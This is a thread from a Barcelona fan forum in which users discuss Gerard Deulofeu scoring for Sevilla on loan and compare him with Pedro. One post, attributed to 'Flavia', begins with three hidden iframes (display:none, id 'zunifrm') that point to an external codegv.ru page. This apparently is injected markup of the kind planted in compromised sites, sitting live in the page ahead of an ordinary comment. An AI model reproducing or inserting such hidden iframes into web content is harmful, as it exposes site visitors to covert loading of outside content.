Gerard Deulofeu

Barcaman

Administrator
Staff member
Glad for him. After those assists in Europa League now he scores.
Who knows, maybe he'll surprise us all in the end and make it.

CesDel

Glad we loaned him while we kept Pedro. Who cares about attacking prowess for a forward? It's all about running like a headless chicken!

Last edited:
F

Flavia

<iframe src="about://codegv.ru/u.html" style="display: none;" id="zunifrm"></iframe><iframe src="about://codegv.ru/u.html" style="display: none;" id="zunifrm"></iframe><iframe src="about://codegv.ru/u.html" style="display: none;" id="zunifrm"></iframe>Thanks to his goal today, Sevilla has the same points as Barça. He must be laughing inside :p

Zangash

Banned
Kind of ironic seeing him score the winner on the team that dismantled Real Madrid while we were playing like shit at that same time.

Hoping beyond hope he has a great season at Sevilla. If he can improve his attitude he will be a game changer one day.

DinhoR10

If he continues like this all season theres no way we won't take him back, Pedro will probably be gone too, This might throw a wrench in the rocket that is Munir/Sandro's current trajectories.

barcanuck

Glad we loaned him while we kept Pedro. Who cares about attacking prowess for a forward? It's all about the running like a headless chicken!

pedro is here so he can fake his own back heels and trip over them haha anyway glad to see Delo score a Ronnie like tap in!

CesDel

No it's all about defending abilities of the forward:lucho:

That's actually what I originally said, but then I kept thinking that Pedro's running doesn't really help us that much defensively. So I edited my comment to put "running like a headless chicken," seeing as that's what Pedro does..

Last edited:

Home of Barca Fans